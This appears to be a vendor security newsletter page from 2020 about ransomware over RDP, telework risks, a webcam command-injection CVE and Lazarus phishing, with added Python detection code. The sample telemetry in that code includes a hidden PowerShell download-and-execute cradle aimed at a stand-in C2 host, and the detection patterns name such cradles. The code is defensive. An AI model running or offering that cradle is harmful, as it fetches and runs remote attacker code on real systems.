In the first half of 2020, ransomware attacks have become more prevalent and received more attention than ever before. There are a number of different ransomware types out there in the wild, and most sophisticated threat actors have adapted their variants according to their attack plan. Some of them steal additional data and exfiltrate it to C2 servers while encrypting everything, others drop additional malware in the network for lateral movement, and the more sophisticated groups even run customer support operations for their ransomware. What they all have in common is that they let their victim know very quickly that they are infected, and from then on everyone's life gets a lot harder.
Since most people are working remotely during the current pandemic, it is no surprise that Remote Desktop Protocol (RDP) is the number one attack vector for ransomware these days. RDP was already a popular attack vector in 2019 because so many exposed hosts were poorly secured or misconfigured, and the current work-from-home situation has made it even more popular. A Shodan scan from this week reveals that more than 3.8 million devices with RDP enabled are connected directly to the internet, and darknet sites often sell weak credentials and compromised data that help attackers gain access to these systems. Researchers report that over 50% of all ransomware attacks were initiated via RDP. Email phishing, a very popular attack vector that sat at the top of the list for a very long time, has moved to the number two spot.
Work from home is the new paradigm that requires employees to complete their work-related tasks through remote internet connections. This new "telework" model provides many benefits to employees, including geographic freedom, the elimination of commuting, and more flexible schedules. When emergencies happen that shift employees out of the office, organizations need solutions that enable business continuity and support employees as they work from alternate locations. The transition to the teleworker model opens users and companies up to myriad security threats, including malware, all forms of phishing attacks, and many more. Ashco's cyber security solutions and services address remote worker scenarios with three primary levels of connectivity. If you have technical questions or need assistance, contact us at firstname.lastname@example.org
A CVE-2017-17105 alert indicates an attempt to exploit a remote command injection vulnerability in the Zivif PR115-204-P-RS web camera. The vulnerability is due to insufficient sanitizing of user-supplied input. A remote attacker may be able to exploit this to execute arbitrary code within the context of the application via a crafted HTTP request. The affected products are Zivif PR115-204-P-RS V184.108.40.2063 and earlier. The impact can lead to remote attackers gaining control of vulnerable systems.
Lazarus Targets Cryptocurrency Vertical:
The weakest link in cyberspace is usually the human factor. Most security incidents in corporate environments happen due to human mistakes. To be fair, though, phishing and spear-phishing attacks are getting more and more sophisticated, so it's not always easy to spot them immediately. The rise of social media has only added opportunities to gather information about potential victims and use it in phishing attacks. This is illustrated by an interesting report released by researchers about the Lazarus group targeting the cryptocurrency vertical. It all starts with administrators at the targeted organizations receiving a phishing document via their personal LinkedIn account. The masqueraded document advertises a job at a blockchain company (Lazarus targets people whose LinkedIn profiles show these skills). The attached malicious document claims to be protected by the General Data Protection Regulation (GDPR) and asks the user to enable content in Word to access the full document. Once a victim falls for it, the embedded malicious macro executes and downloads a PowerShell script from a C2 server.
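Added example, not from the newsletter or the cited report: detection logic for the last step of that chain, an Office application spawning PowerShell that fetches remote content, run over constructed process-creation events shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine). The field names, scoring threshold and sample events are assumptions.

```python
import re

# Office apps that should rarely spawn a scripting host, and the hosts themselves.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line traits of a stage that downloads and runs remote content, plus console/policy evasion.
CRADLE_PATTERNS = [
    re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    re.compile(r"invoke-expression|\biex\b", re.I),
    re.compile(r"-enc(odedcommand)?\b", re.I),
    re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|executionpolicy\s+bypass|-ep\s+bypass", re.I),
]

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Score one process-creation event; each matched trait adds one point."""
    reasons = []
    parent, child = _basename(event.get("ParentImage", "")), _basename(event.get("Image", ""))
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {child}")
    for pat in CRADLE_PATTERNS:
        if pat.search(event.get("CommandLine", "")):
            reasons.append("command line matches " + pat.pattern)
    return len(reasons), reasons

def find_suspicious(events, threshold=2):
    # Return (ProcessId, score, reasons) for every event at or above the threshold.
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev.get("ProcessId"), score, reasons))
    return hits

# Constructed sample telemetry (not real captures): a normal Word launch, a normal
# admin PowerShell, and one event shaped like the macro stage described above.
SAMPLE_EVENTS = [
    {"ProcessId": 4100, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Documents\report.docx"'},
    {"ProcessId": 4212, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Service -Name Spooler"},
    {"ProcessId": 4388, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage.ps1')\""},
]
```

Only the third event reaches the threshold; the benign admin PowerShell scores zero because neither the parent nor the command line carries any of the traits.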
Our Research & Insights:
Whitepaper: Effective Cyber Security Strategies During Covid-19 Pandemic
Whitepaper: The Essential Guide to Secure Remote Access
Secure DevOps: How to make security integral to your DevOps process
E-Book: Effective Security Strategies for DevOps and Application Services
E-Book: How to Build a Next Generation Security Operations Center
Validate your organization's cloud security and compliance posture using our Cloud Security Assessment.